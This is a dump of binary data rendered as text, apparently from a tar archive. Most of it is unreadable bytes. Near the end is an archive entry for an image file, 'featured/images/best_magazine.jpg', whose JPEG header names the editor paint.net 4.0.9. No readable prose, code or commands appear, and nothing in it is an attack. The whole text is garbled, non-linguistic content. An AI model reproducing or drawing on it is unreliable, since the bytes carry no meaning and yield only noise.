̦Og�0� �!�=��Ҋ�iwԒ9q'S�8�$���jUe����%����W��'f�<�4�����Ͷ�%�|��2�����m�esB�ʉ1X�4�jx�UzRI���҅�܈u�����f�8�]�WΓv������䨮�T�36�3٢n���`u��1����^h��@����wfH�O.�������a1�J��v�H�W~Vv���r`qѶ}��%d|)�awk�&b�Is\���>0����b���Q��/=4E��/i�Ȕ�@x����#�N���aH"�EY������ogˠܰI]Lhú�0*��X�4T��_�,,\w�fq�з`��U�(��8���L,,,WiRX����f�'Kp��Qͽ˯������맻�8���x�v���WQ�<�}��,|Y\$El`����(fXHÝ��D�`�����y��v��!Y�>�]?n�S�/S<�1�9����o5���t���7��K�ow۪,�l�H0��MG�;8d�݊�]E�U���v��,�6YT:0����V�i��8�sA6���b,x8Ь�~!"c�U�����V� C�����X�M�b�5RM,�#t�M�Fg��M�5�F�?�ӓ���fR�$��8� o""'�%Y��ŋ�|ŷ�3��&^,?��
����c(<i`���p��q�U�F�ʭ�e��0�����[�H>�{�.r�)�j��T��X�{W����8䪉�_��?��\�š� ��
����1���E��ʒ~����6<�'�:9��_��Ȯ�1�8g����j>��xs�|�s�̪�$��x+)v�V ��/���u<���CT	%�4�R��T�䪶��l�DZ�$hXcұ�3.!�8�u��>k��"�6����=d��:�x�?�qᏕ�:��
@�O��0K�n��J�T��N9~��b��
i���̓U������V-�>ފ�%�	cU(��oPp�V[ח����˧^&]�k�̶Hc2�0[���Jw���S�゚5d����<��7�"#�6��`X�c}�-�H���E�ֶ�3�T͹��
l�bx*�bU=�/�,w7u��7y �j�:-�)�������^㢟'�:G�1fm�pn���g�/�
T���$h�9䘳�7��b�[d:AX����ԇ���/g�2�)�U�0s���О�,��f������6��rpN
�ַ�{Q�ǩpW�`6�
,�x��~����7�EP���B�'��
�y��ڳh5Ԏ����F(<u�A�3���)��U�N�:� j2��(��=�x@�y�{��W�����m`�2��}�\^L�3�Q�h}�gN��������*ۋp�*�=;{/�'��16!�tP�C�*��4�w)����R�Μʼ��t��8��G�����q�͎RTe��TTSL�)��%dk�m*����<�㪞R����Cvk���39��F��
�m�Jt��0�-E]lSU2�iMF��3����Y.���1��Y;PS��,�5D��R�"�;,�+S{�&zfڟ�X� ���A�D
<���ne��
��t����e�RIO��$��Ys�f�n���s+\�)�6�Xd�z:�����RH�n�����=�:�P6`�K^�oK���qd���9R�V�PeQCQ��P�)�����r����-��m�7a%��"�:U����H��30�M��D�z���C:0w]{��*WqU��*#Y�i����a�+�"���)Cl�$I,o��f��H|6.B�;�t�
}x|�If�Ubr�i���v$��ͽ9f���f���GSf���iT/�,U6��H�L�{+��g�Mp�d���K$I,o��ckc�� �у`d@aj��Mt�Z|�?�|�AFx�=M
��w�h���+�#]�x9}.��tl5�˪��F�Q��)���̒i��c65�ƚFx㪆I#�y�H�v�Ek��S^���w���S"��*�*�Ĩ�{�<����,{���~ln�?�Q�e�])�������#z�V&3x�'z�Ƚ���
ieW���{��n{Z|�.=6�C���2ܱoz��*]s)�y��C�w�ܑn��Iݻ�ӷ��ntҭO�A�"��Q�eR��8Եh����0�%�]W�b
s4br5�PJW�X��[� �עI�:��b��5W��q�L�l�:F�
ZaM��,��?�/3��Y4�8a�J��77�I���{� �gA�����R�Y�Y�����b�s!�+����^1l�~�x�]���<�������F'�7υ��s�B�h���5R�LK!�e2Lz����DZ��q"�c�&%����(XZ�b=���pӘ7��u�É5��;�梢���7�"�%�-�v�Z��
?]�����p��<�G��m.B��H��.q_f�YL��2QU#fy��њ���e�njZA�u+x#��>2���#���O+��˔{Y�ԣ7�Z�]`�LOV�Gl\=����r͔P��}X��H�vf���UM"���s+/�ɍ���f`/V:�$Ʉc�l���E�ġɈulu�����|���׻Պ��OFMF�U�<�p�Mh�At����M�_EB�	�5
z��������D< ���+I�Ԁx���v'��c���,�GJ)!t[b%�И��pC���������P�U0U�GM7��$N`�ŵ��j4���vFi��"U��SB�C�^DԵ�1�F�_�:[г=��x
��SIY�^=�N�W���l���%�ka�\c6O1�vH�����Q��V��
H��P�^�O�S?��oUT�jڶ�E�sBKC7�������w��FW0V���7�,�u��˻V�v�|7C.�u��>�ё��F=��V]�8k���8]X+i�~�*M�Y�9]|�l�2��*b�t`x�}��@����"-u�s�~��W&�<5��y��ƪ���o��[�g�@Q�
lE���_����/jzN�y|^"t�7�vc>�]͊^[�Z�����KF���i�h�uX�$U
<�`�m���扱n|2��g�X��Ѿl	^ ��I�:�`���!$�[Wq��6:���N��g���Q�V9�s(��
��<۬�<�7�%��J�Z�)"��,�R���Z�_�ؖ��養|�ȔB1M�KvA�u���ěo錕�iM;RB*���cO!�v�ѻ]������YcG�ƈc$n���%���呟�o���R����A����y˩T�1 ݨm���Ҳ����c��Zy�z�<�!4��������m`��T荼��Ɂ,�/R��)��ċ��vd�n�9�Uf�x���3]OKG�bѫ�T@��cNt��Y��X���I�Lm�*$vV�lٝ������ve㩎R�ȍV�ڢXf�r�-��}�q���p��4LT�Z#	U�0gw�x����o�u����y<r��2��my�2�M'g1�>q3g��ccf60�h��2Z��@�	/wR�*��n���ׂJ�(��m�ѽLːʕ�M5\��B�cM!r%Vesj%�;�l��]4��fc���&b�
����K���cH)�׸���a����o�Yu��7sc.*{A\�k���2����G
S;NA���<��
�2rH�������y��eE%�٦��h��U5.��^-BI*Lѣf�GΡ-��i0��RU�n���WSS͇����G)S�#��##q�-��u��͠ڤ�5/��=M]�N�	�<X�U)��;%�3n�|�Nj��jJ�����D�_�⪊�f�Eћ�(۵�2w��s_���)1�hQ:�����u?0��� �-o�p^�j-Do�O�q�2 te:�c�{{)��ڎL�c�;�oQ���:ہ��V�ͤ��oh!b�̮ �y$��n=�1��g��k][��c
�/��K2��U��҂5	R���w�>�J���P�O�M�4�z�ֲe�_o����a�*�0H1��Ccާ�������\���c�E�ئ�9�;��y�K�%7Z6��1)ANcH�n3"-�+2.���*ݷ�t�4�%�e��>gY#-�,\4����~�w�W{*e��yWI�#,��в�`v�hc�V��8mN�rT�K��^ڲx$�fy%��)Qw"F~·n?���O�>'�����e��T�ݭP9� �'���
u�[�O3��xPƍ%���i�p�b[13wm�aʚm��L�#,Q̋w/!_gn��6�$
X��桚)Q��*�ijýk����~�r�z
x��^i'�����$��k*ZW��\?��.�^��b9s��V$^_z�4�I�7�$U�8޳��;�>�b���J�f
�����Kٯ����/��ٿ���Zz�/����vږICphX]z3cq�1�>e0��s,�&���j,㼑V���U��׋���S�w%b�n��G%y��?Ljw����c�SG���q�Q;F��)���&�����v'e��N�B�q�7,L��w�:!$�$���y(�q�U���tꙪ:��A1W�`�I�����2�*%��F��w�ķ��dPH��P9��~+�gxqcŏ����M�@�`��)�l�6RJ@��ˍH�?WPU�I�K��m-�)��M���{:�/���">�
�3
~�o����7b��ƒ�l���2#f�=��>�	y6�5��,Jx�Q3��Ga��b)�u��n��$L�Oj�nh�1y�0J����Gɷ2��������|�Cη�c���c�{}�O�MgH$&F��R����1~�����7"(iʫ9�I�׳_@7i�
'�I��N3����
�sfV�#ii�!��ޖ�иӓ���߂�`�t���6�3D��� 2��d�v�_{j�%���l��s�-Q������y��%�ڟ0>Md
9�ۮ�4�c��8���;r�sk��*3	Ċ**�ޫF��~�++��5*�Ӳ�.�O{�!jk�
�y�Y��v��[��E"Ъ������_F5�;���=��g�1���[ƞIe"�#�9\���w����w���4UT}Am\Uoܽ��tZztV�F]�}�F+��X8Ӌ��ϛ�r�V�W��տ��
df
�ǂ�v�n��&�f%�Eq�3jʙ�8�����,��@y�3�h�)�Y�u���]X7�6�1�ʯ}Ga�?�}����8�;'i��]���^��q�9����i$���}��āMKV��HXpa���H��D�JuH`�n��"���p����;F�wD^\���'5��1�bc����Q�:h��X�PU]���XžVB�G���O[���l�)�Q�0�a01��(I�����7�S��+wW�nۂ5b�*ȧ����`Ҏڽ,�%�O<QQE�{*՛���[{|�;��^�Ћ�K���Q�YN!E��9&xf��	���<�4����l����K��������d:>�K���D���]o5�Ę�DjV�)�Ҫ!e3V�+^�����x��ur�GEONf�H�WS��Q7_h�,}�eog=�w�����$�
�LIRD�p�eq����M�3ٸ՞�-5�]u����}����,�Kdm�T;��Jcm���U����ޞS5��%�����cz*i��a�m�H��RXڡ���{�����ħ��(��!��疔Ɔ�0�! M�.nH�K~oM�ظ3��j6���ꢲ����o�����YcY�"Dz��$�p�D�4_]�i�����Z����� �'�`d���M7�])z<Λ9Y�*R@�4��4�۾k�����-n���yfvg��+��k3r��QM��i��9�t��z�N��ϼ�;|�<r[���\��jeh���I!�X�&���U�]���_�irJ�c�e�ϹH#����X����3p�f��N��Y���\R��;r���u���8�u��t�@�l��|�-�%S���,D/S@�DKII���4�ԉ�X�w�1�_�Y�*Fj���ϭSGJ��y`����S��VŇ�n�2�M5VWG2��Zc���;2[-�ƿ*�斚�R�C��ābT#�i�p����>���/J�:��.�N>��$Qg��Z��x�]��ZŖ�Ռܷ㝞�B��=,.�!"�(c.-�Լiط�j��	�G[>h]�Ʃ�FY��c�Ȣ�I!?�7�&�h��Oͷ�YZ�I���V�>��ߺ��q���o�b>k���X�*������n"���^�q��\�jx#�{X�>��EZbi�E<�tFs�Y#w��ʯ*����N�<�*����c3�0J�ɺ��KD�'h���He.a�c�9�n�ysh��(%�@�j�yj"�s6����[���soC��pW��m�\�����=㢖��W����1co����MN[Ʀ����Fx�Z�u�ҷ��>T�ڂ�hcM�����qq�PT#(�������I�y
���S�dx�y �"�'Y�Y#nGІS�LzP�aVw�I
غ�ԗ"��ܫ�!�]Ӗm��Hx��Ƨ�����.&tj��5L�UK,m�^�5��0�4�{�������c��|���ʄ U��w����i�y�8��}��EMI t��f#C�r�\vg�Ԗټ���\�_�R|�g6�
�)h<�ɂ�ID�,�|���^�^�mq�2c��z�:�-S�n�;�`���3��EÖ :&.*��e����ߜ�I��Ÿ���8�>Z������ځ�TQ:6���Vc��'�f��{�G��������{i?���ͽ'�=_�����
4P�C�m-��+nƅIV��F*�9��[��.��R���K��r��N�ꉎE���1���ax����c���O���Q�5T�W'���
�u���k�H�U��|��Դ"@
Y���b
���]�[��b��p��o�_�l/_�lTށ�)j��4l�M�K$r��R���7?e�R:_�f�3��*����MMOkxC@�Jw���1 ���f�����ͅ��͊]���G���R*�"���by�m�i�ؙ��"��TJU�����t��!�c��a�����6>����ͱ���@�BS�k��ƒ$�[�L���{�~�.�T�L�;�m�6;!=�E��@�\F�`���da$�Nc�C��F�_��z�㊁��ԭ�I4����P��|6M�x���2HG�3��]n9�x�=�|֋08h諸��h
��]V�ӏk����v_TOJ$�8��{2ɼ	`a*8�yyy[ꯦ��*14�Yw�K�;��
�e���ذ�_ҵHw"yB�n�O?7����V�i��B��=��6��/�^L��J$��:�Ղ�#��n�Q�]CT��i�sf�d�ɷ���{8�T�4O�f��ֿ�ė �[ᆠ��6��-;�z�'Mɖ�������/u��Q�� �N����0Nڴ��@�l��%&��!��Hо��u�{7�e"�t��;;��*�#]��v�2�ٓN7��m���OK�
��+sI"��Ĵ����5ƞ<ءly���|�
��/��kwt�U��K,U2Et�ۺs$��vm[����lL�=5L{ؤ23���`�}�8�] t�`���VRc�Ѵ���UV�3�O�t*�k*��厬p؞��Dm��:,��-:7掴��b(E��i�[��zX�W�Օ?j��}8�W�'.��R��៖���1�U1r��D�>���MOW
6����������P�+��� qI۠�?�Q_+�Tɠv�:�7[��u$���]�)�S}����l�n�
�
�.�IShq7�yp�_ê����B�[T�X��FJh�Y�b��ʶ�,\�C,l�k�@#�i��5<�H;u��+y��	�.`�*̹f�9p�z���[�U��"�����=O_�����P�m��|����֢�i�	���������
����m�ey��;J���7����V����-7j����&�)Ԟ2@&���yz���֓�<�\�J�}��?��#t�����H�Y҇W᧧��f<�lr=Qmq ��l߀����Dq1'�=_�c�T�
�I�6�_+?��p�A��R-\%x}��ී���ԟ�T�a�8�"��w�R�n
�b�j>��<�b�{��K�%�1�*�7�sl� ���Pu��+z��F%�]R�4�~_���5;�T��/�O'4��7K+�=x3�{�w�l��-;*�S
���w�5Övw�a��_��X��XXXXI%������t�^�Pռ��­�c�EC�8�ӏO^5�W�&)HOU�������ڏ�󚢛��>�m�ʉ��k�V]5����`.���4=Q�c�Yh�)*�h��4�k�$���z:l�\��*Z�3S���Gd�Xw��R�*vd�Y$�{�#c��Rt*O��	�gI��4U5�͗e�e�u-���������E3n�|�Ɂ��5D9f��7h�36���GPGS,��T��)BMLgd�D�yuKpV�z"̫&Wzi�����I���g�ѷ����2�a]�E	M�奌Z�����-�s�I���Q�����TJ�|%K�7��&�c�b�u�^g��s
?1
G�Y��H�'�Z�U4GE
�m�؝�nԬYsTN��gcԑ$���tscj���dFdD���ۻj�E��ΔmGR�A��9Upu�*CUTzu���ka����z�bM$�o7�?��Y��t�G�
\���\�lk�H��Uu�Z�0S
o�h'O���������̊��J�^-k#_n�������}U�'8�S]Xa�/"�EH���}<J!���X�@*�]�vҹ�Æs�J"Fk�jj�Y�}�u�Y�o�O;����~�E��1
��2��t�2���kd�AU�$�o}��Ǟ�4��k���p����ߪ��6]%�*��G%�@�<T��"����|��9�T�?����0w�)&�F;��/+P�r�5B�[�I�`�]�/�1$̼0ݔB2��TQ$����MF�2�Ƀf�ߙ��W��z�#��n�g��8�t�{���wJ��ȱ�'���ɩb�f?�7��n[nf���*��v��(�d��ƑB����g�s�^��w�� ��y��u��0s"��,�:ܸh��c�/�H�.����H�Y��	j^t1���Gg& Zy~����x�w�o୰����'V0Ⱥ��Ls�"͖��9��%]9h�ߖ[��形�X�	�T�媫dS��H�1��\��{�k��XئP9vEl�,Q5A�[]ߊʩh8mׅ��eS�C4�P�I"�Kخ�<�j]�9�;،�A�u��fSg_��ѝ�ݛS�ܕ����<2������0}d2�!�)$��g��[����cY�f0KA��v��T���� o�-�_��D�ѓ�>[�{�R7���G�ޫ���?�I��fj��un��>�����\Ƀ^k�%
E'�֋L�٥4.b��oM�2���'�%&_CX2���#����K9���������{��F-�0
�tO]U����'O�M�[K]�BH����w�H7pB�7��Z�_I���і��4����D�!#ԤHC�>��`���6�QN�k
6kO�U�t����f���E��z��׃VD���4ѝ"-�hx�3Z���l_
�!���~���Ks��7]tn��dv��l�:�OD��M���u�ԝ�$���2"D���Z�~�-{�o��^��K��V$pxX$Gߗ�]b{���M��W#�ұ������'�(�V�E��=�\��Vʲ֩�
� W�˵���I,[��5�nX(y$�E����	#2�QW F�����U�b���A�A<�$���n��,��ՁG��J2��$�
��xq�4d�h\8V"A�4�)aaaa$��'~������Iߪ����xc���L6w�a��_��Xm��q"����Iaaaa$����o?����,q�
�c�Ij`Y�9uF���@H��n;���E�gTUyeYu��M��&T�(u~Geu^d�V\��+��H��1Q7>9
�[o�|S#K�EC h���*�X/gV�_��\Z�������1�'�,�P)�Q"ʚ�/Ufx��|�%�v�p�����9HH�
����W�eh]����*2q�0�G��S��Ù�L/Yf)����<]�x��k��Na#Ewl��ї�FQ�T���J����^��G
ʈ�#2�&�]b����|�z�چv�s(j�M�T<�.�_y,iQJ�*���O$���\��p�cx7��aW%��|f��M��^�WX�y�=��M����I��,7a|jζ��y�>��b��@wQ�Z�ql�eBC*h���8�yN�*"u��V���m�����MA"����cap��}<ih�6�6�H72�v���[3�zz��
��*I��@�8�[w1�~3��)�1����o����n�. ���/=)��a��M�i:s]�qݭ��M�� ����%����¨ѐ��8R�
�9��b��yb�i:�ݦ��0�0��|��U���&��%J�i'X�9a����J5����*�<)i������$��H��ɯ?5�o,���wM	$ӹH�R�9n���W|�f2ʭ�u)���
����^��jsr��w���2���>�����m��c��B�Te��*�Z��(��z�#w$uQ��� ����ϏG��J�\�3���\�iJ�aa��b�[xϥ���t'�ӓh��J�)��+ky�p��5�9,,���SiTG���������4��
���7��"6��L���g�3	Z�_j�I󭱤72CR�1�!�������t�N��J�1&jZ�g��by-n��a��Y��T(n薞;��]�3���!hyFM����+~9���y.kIDf�x���ם#My��۞M9�1q��~i;��~��`�E��p)-[��UDCi�"��~��2�� pl+���
��F7�xG�5䌼���@M�c�Za��/�欬��ZJzfi���$�չK �Վ��5���'AԔ�1�g]I|�n�;��g����I%v�<�Y�p����.oю_O�O$fR�.�q+L���Č�ϗ�%�2ւNƉw��V�x�%4����>6A,�84�<��ERb�8]��ʷ7{����Ԫ���g�Ei�i��8Q�i]��Ud���f=��*�6O+���ϽB�b�ID�i��Tn�a�3���$w�Ts��е�L�s7"�x���9�V:��v�����G�p��:�ː�F3�0|�-�yi���ȷ�"Q;�ҿ&�sGt���DԴY�cUB+'SK�V������̣ͺ�j�f)j]�����k#؂eT(�z�k�#����������
�2��X�������t��_G��g��n�`�;��I$jzk����g���mD@�j�����
%��9�D��כ��ک>����>�C�G��@?|��8�Q�����6������lkEd<O��I������T�o�\��풎�=�%�\_W:����Uď�
'C#v�W)��I3�݉��
B������X�>k�����I������xc��R����w�.��<��	�k�O6=|�����_��fK*7a`#�o_'���޾O���d��v?(f��|W�p�P�����fK*5I�ƽ�������_�����|��,�eR�肌4n�XVT�����8���r�9����˚tME3�$��<Ĵ�{���&-ڷ��I1A7���?㏿(&��|G�p��Rf�z�]w,8렒P�����S�f=C�M:OOSh��ػIM���W{�1�o_'��>PM����XO�$K��5���.�eݫ���C��/�sp.�H�������ǟ�3z�>+�8�+ؚ-:4
YA�m
�A*E����̀���|��/�3z�>+�8�̚�[5��dx�[�Ak/2�=F�>����Y���#tT�#��x�Z�f�>'��<m޾O���=
�������ZT�qt)���S�s��u�oGc�~�~�ۆ�4��ě����5�،~�������?7���?�a**W��i
<�ʗ[:��Au�oz�_'"� h��t���p9;A7���?�-�z�>+�8|������Mo��NȲ��������ׇ:g�w�޾O�����|��]��<4M�!Mh�<�jF&~�1�&�X*c�*5ʥ�t?f���M������	�|��iR���cL�4M��,R����7��c�/��.��j�B�#��+ʋ��*���]w2����66�o_'��O�����XJ��G�%7�\
�+�+e�svUy�)�1�ø��ǐ��k��=�^LB>PM������	�|��V�2F�<X;��TQ}�FԞ�P&��c�.g����:�V
�z�>+�8��o_'��ap|+��]�s���I�)ȴf�p�C7�����o_'��Y�r�v?(f��|W�p�P�����fK*7a`#�o_'���޾O���d��v�%������x�������_�ƽfd��3鮗36�x�:k��!�a�N��featured/images/best_magazine.jpg000060400000205325152434416630013135 0ustar00���JFIF``��fExifMM*>F(1N``paint.net 4.0.9��C��C��,�"��	
���}!1AQa"q2���#B��R��$3br�	
%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz������������������������������������������������������������������������	
���w!1AQaq"2�B����	#3R�br�
$4�%�&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz�����������������������������������������������������������������������?��(��(��C��+�G��S��+�m�b����Ϟ���wK�R�ĝCY��V�M�K��I$���ZFiD1��K#"�-���9��\q_���+����|y�e~ѿ��/~�Pxs�o�uM�L��h/m�KB�M��㷱tY�:bF\�$V�ӂ��;��W�b���#�is�6ٮ��<<�y�)���5�k_�[�{���b���A�����|��(�����&��+?���I>����Ib�F�������_���ˏ�"�~&�Ϻ_Ý�Z�7�/c�D֑;�^ɣ'�\oa��#?��������5�_
5O|���~�~4ҵ+�ړi�g��`�/��f�*�����_ii?�'�⿏�~/|k����oF�{-���^���m�	��Z�C;3!fw�
9���6�p]��\�T�r�ͤ=�E{;��u>�+�?��󪼭��0䳒���m#}��4X�[~/�"����:��G���'��w7S.��8[m�,I��+��RB�����ھ8�>��J�w�ho~ ���U����yᷳ�ne���
��~�_-~l8����JO�m��t���Z6��pè6��f/�yS<�;�/(\�,����&1���o�_~��
���n��|/>#�k�f��z��wq4&��f�퉶��WT�IV�H���\�0�v�Z凍~e�~XSr���Mon�~o�<���K	�T�{IT�����=���|�N{Z�w�K+��c�_>�|���|�W�_�]6�O
��X��k�R�͑��V�*m���|��_�,w���7�]o�y�G�?���l:K���R�k��E����LM;Frp]�k韌_����7��ƿ&��|o��	xgO���Χw�I�,��l���`�ٕV$���?a�(WǏ
h~�	��<7�
C��M/�W��![}>�.@���JJy
̠��׫�5�P���ٔ�}e9r�S��^�|��+�^�/����ѷ���,���Ur�V�-?aF��s)J՝I'��\^�5�(���i�u��2�;�����|w�|��߈���{�z����i�U��<�W2��˷��%��TF8ϔ]��X�:G�j6߳���~%��&x7\𥷎u�$�u�7W3A464�n��
��K������o�z�t����~��Ǎwƞ��o��G���_N�khb���P�w:##엑�'�	��v�k�~Դ~�K�D��>,x�Ă�\�$���|g��e$Vس��M���Gt�0��,�
��K�˒�yI+�)YI�t�����W���y5�{_j��,bݽ�y�Vo��ھ��A�
��F��⥧����~��UuO��2��{�^jz|��Z=��������#f\��3���g��b�&�O�}�D�^ �±�b�mb=Kg����i�B[���0#H"�3[����ߞ ��o�?�+���t;��vqxZ�>ֺǍt6�u�Ŧ߲�4v�C"y����x�L�*���4�?�����6~/�u����Gm��-b�e]<[I(����2@ӭ���E��ǍO-��Q����=���I�Ӛ{��w������a2\Ä1��Ӗ"8�j�Fo����1��5޲��O�|��u��_����M��y�K�~����馎�MF�+��$*�J� g��b�
���k��g��	�O>�w�?��9���z$�%���~�
����4e�b��I���*�p��ǟⲿ��<�8�x���<�-�/3���EVǔQEQEQEQEQEQEQEQE�_��,.��U�L˲-���{a]=y���1/�>�C&�2y!���2n�A�9�(u�JѣI%�QƋ�w�
�u$�_�H��h��o��y5���8��Z�f���E��*<w
U�������O�<_�g��"ּ�n�hs���T�
�v�~X���5=K�I?��?��Z��I$��T����j���?��Oҏ�C�}d�(W�I?��?��Z���J����O�^�w�����6�����鑟ˈ3*#�W,쪪��j��V��>�~����W~'���O��ڞ���懭ib&���F��Y4SM+)d8���>!�x�]$:]��}�ߵ�����ugt���\�Y���8dfVWRףW�?�x�>5���_xs�z���c.��Ao�X�-��O	��R)-|�kS�bD>hg���uQEQEE�'����9=%��
�-����߆�
<��7�T�P^rzK�~�(��߆�
��n:��9�b��q�k_ٳ������z^��R��g���—u7��J��7eդ[�\��x���"�ϗ��2pM[�lݓ��)|���¿�����p�ş����3�?�G���g�
�X��t�KM���Cu=WNӞ��v�c��0��/\�!�$<�q�����7�O�����3���_��/�����|5�g�O�ڗ�,��.�R��5MR��f��٣�6�w0�M̱�	ߊ��|���9?�/��o��_����g��C�����He��n�ឥ;;x�?�ך;j��*�P���k[iL�r.�9a�W���Iिc���|b���3�П���A�;�����f��'��)i�Rʺn�����4�=�Qs{��\�#2��O��~�(�PtY���?���g�Ξ<���C�
.<���e�3�!<<�i_<W�;[�N��\��׶��?g#o�%�hY�s����(���
u�B~��Z�z'���C��o
C�߲�����f��o|WT�,�,�����ؾN�t�4|���P�:,��n��K�'�e��
��������<	�S��V�<E/�?��=���9,��u1��;}�����T�rp���x���l���K�\x#Y�wg�}�~�]U?��x��H#���-�LC�Nۈ���rv_����G����߆�
����M��t_��[-��W�<a�7���&�{k���d�$pC�]*[��.d;���5���>?�^�֬,�-OW���M���иO�T�����]³\�f߬���Ƞ�9?�/��o��OI���~\�N���h_i>�u�2���.�����᥼���[�4p��=VI ��k��[Ip��h���U�rxS�>$����������NW�,���!�7q���眞��߆�
<��7�T�P^rzK�~�(��_����R�@y��/��o��OI���KEE�'����9=%��
�-����߆�
<��7�T��[��4X K��S�{P��_��;/9=%��
�y��/��o������wV���y�*�NOԁA�D��Y��Qv�y�m�����h���_����G����߆�
�?���W��1K���D�r���OI���rzK�~�+����:����&���������u�
Ÿ����(���_����G����߆�
�c�L�\�ZCso%ՉO������L�qV?���E�O�Q������߆�
<���¸���C�����≒[x��f�-�X���2�G|M���OI���rzK�~�+����?�����{P=#�l����_����G����߆�
����E�~����?������OI���rzK�~�+�:��:�C��H5��	������9=%��
��ojދ��WM���wh&���Fh�J��'����9=%��
�-����߆�
<��7�T�PE&��?:7Q��qًE&��?:7Q��p�������k���ōw�V��7~�>.�5_i�#o����˯M�M9t�o�1�ӥ�In���"EQ�p>��3����P#��#�3�ŞѿfٗJ�>�񗅭���<#c��G�l���oBBAE��j����^��sa�|G��?d�x��
m�5��x��e��=���pA���B\Z��4P�"�5�E|#{�$|5����~��-�Κ���o���A�m��9��f��]�Z=�n�J��7I�~^�[�?�%��c��~����|_�j������կ4
E<��Y|�y�$mě�p8����y4������o~ß�S�
X���g�7�l��ƚ��[��v��(tv<�&m>�;p���hR�p�`/ٮ�v����� �˯�ռeo�^�b��4�
R'�R�o=�hHӇ'9U��.��?:7Q��qٜ5���z����+Q�W��t�ߥ׌�nt��-R���HČ1`��Ҩ���¿|>�|V,?�%���#���a������w����p��iwQ��qjy
���F�J�C��U�X�hPXt���>J��i�	���(���A�O���tۍU�Y�mCJ��mn�4����յ����+�����N�{�����=G�E�fx�����"�I�4τ�4o
�3h:m߄�������ֽܰ~ ��b����c���0���*����������f-������=G�E��Z)7Q�Ѹz�΋���Rn��p���Rn��p�������:��Ѕp5�z�Msg<1���6��+��{��?��
s��v���͍�k5��
�L8ea�?Z�+%�,<1�j�q6���zuޮ�:�K����s��[]�8��½������w����)hRmu��F�.����ӵ�!�\���
�&.�3�j�Y$������k�z������]��'�4[{[�V)T���AR	�<�����^�`Ǧ��H4������S�
Y�~*k����K<ڦ��a�Iwv�&���!�c6y����S�厣��h���s��?�t��6���6ȯ����5�!�oS��
?�o3���w��Aj|�cx�W�+�4�b�T�4}KL���K�7�d!e�|�h���<�sN��u�#F��ԥ�4��ϴ\kGOXw��	��}����f�������6��y�
C����r=����їW�ha�˙#��<�E�1�qp�0iC �x��W7ᛷ��|ge�\�)�ԗY7Wf��)o�я˱���־��½�3��'�
�s��������awc�3�j蚔Z~�s��o{����C���U���J�M�|�x�|����ii�jڊh-�&��ķq�扭�kU�g=ǖ���������(86��I�֤�����~:|�jKF
�����-?���5����ךl��s����k�@Wn7~�3����qY.��)��{�bu��
�ik&K�fTc�m�/���8$09%�
}!��y�o��jA���ǿ=~o��
��c�%�V����j��E�=Bk��q�Tq�Q�~�#�.��y��,d���~�&���uķ����X�0x�ۥw�A��~:|�j�x8�@�(�����]��� ����X?�W�ރ���K�{KA�7���֝ũ�E&��?:7Q��qًE&��?:7Q��p�?ȗ�O��������(|K�����࢟�~߶�%��:�*���?����/�����?�G�C��>�����E?�l��J��u���(�����C�_�N�����K0�������#�@4�T?�����S_�)��-z�N������,Mݟ�Q�h�\̀�u���$W��O�*o�$������g�,j��O�'"�r�G�W���/�-���^;���<Cs��_��
-�'s��Z^j2iw��(m�5+E[b�3�+9�p7�n��j�$�������0~�Yf[�x����i���mB**�Ү�V�CC��M���~�?��>,���O�*o�$������g�,k����O�6�|e?�׺�(Ԭt�����Dm�^ǣX�g=ޏ�k�'B�K�ϴ��ە������O��	��x�H>7��C�u
oK�����umImg��k�����Vm�S�U�b�ݣ�U&T��%)>����ϗ��g�_?િ�S�OǞ�Կࣟ�~�e=Ӊ�/?k���-�emC�������QO�?o�<}?j��u~|$P��8�K*�����A�O�
��G�~#���/\i��w�����爴�:6�Mf�5/!�uK�&�s�+�nx�v���,��:uS���ݟ����a|)�q��$k�x�k�Vp���[]��?���QO�?o�?��Ŀ��G�<��
)�G�g��P�������6~�� M#��1�7�W���m?��}/̵�_hRB-tK��޳u�j׺�����ؽ�኏��mo��
�
�G�熾/�/�+}��t�*�~!�x�M�.�P���4�B��{e[h�et��:��)?������*ͤ��c�T�6�!��]Ԓ洨�V�O���M�_�)7�S�������7���}O�?S����QO�?o�?��Ŀ��_+|>���<#g���/�7^,���:��k�}-�T]����#��������/ď�T|I���:|-���-o<5�㦇�ͧ���Zt:v�5;�OP�Q����M��,�Z��lP�R�g�o����/7��\;
k��i�T`�[/v�kv�����QO�?o�?��Ŀ��G�<��
)�G�g��P������
#��?�M�ݯ�|y��ˣ�B��_�4=/R�.��Y�I��ܘnn|E7���yfK�W\��~ϟ��������Ɠ����>��U��<��K�x�D�ڦ�!�U�[-n_&�ݞy
�HC���z�Xl�
���'���q��֬��,�e��-��c������M�+?�R�(�����������u?�O��������(|K����Cq*�<n�k������ޯ��>��g�A�5������ �i��/A�e��[���L�p��YA�[��ϝC�W����>�3�xG*�N��u9�(�*P��ʯn^��� �����E?�l��J��u���(�����C�_�N��<Q����g�g�-v��D�.�
.���h�4��`7���q]�ۛ[kh�D.�rS˕�<��_�g�A�O���ַ�.��\�GY����Z���z��oc��ܕ[+4�:�qj��Ѫ+H���,sR�/��y�{���|:�8�-{��!�����]j|��'����~���>%���?���QO�?o�?��Ŀ��_`��߰����
iz����x���>��<U�~�����@��!�5�Kx���6��J�t��A-e#p�'��q���e��<����0�v�7����B��g��
�+-��'����<�Y�K����X��Y�H���n���`�
�ؘӎ]��MЂN�+���K�����ࢆP?὿l�yM�7C�_Q�O�'�<��
)�G�g��P�������l?�q��~�|'���o��g}SW�?�YO���?��Z��M�z�[��ӡ�J�̩$P�%��C����f�����+��>�~��������4�\��:A˷^[/�4r����(�����C�_�N��O��������(|K���w��c��F�o5��ڎ���k��m��-m�Oi�tں���v���[{�L7dyq��I3~�<�����x�H���sú��]U�#�/h��}�s��{��������N�5�ڍ�^D�Oy��Ed��xL}����9��*�8�Ѵ���5{[m了\���I�ࢇ�o���GC�_�N��)?�P<�������^%����G|(�C��5�/ÛԶ��WX���:�~.���ݐ��ťò;\9D��]�Y�1|p?�M�]��+ͭ���eVWV�O��� �ڍ:���[�֕>�Od����<��
)�G�g��P����������E?�l��J��u}Mm���'O�> x�֍��?4�+?x���*���Y�7Z�j�u�F�4:��k[k��o"h�q	W����bO
�zƭ�z����;�<;�����x��
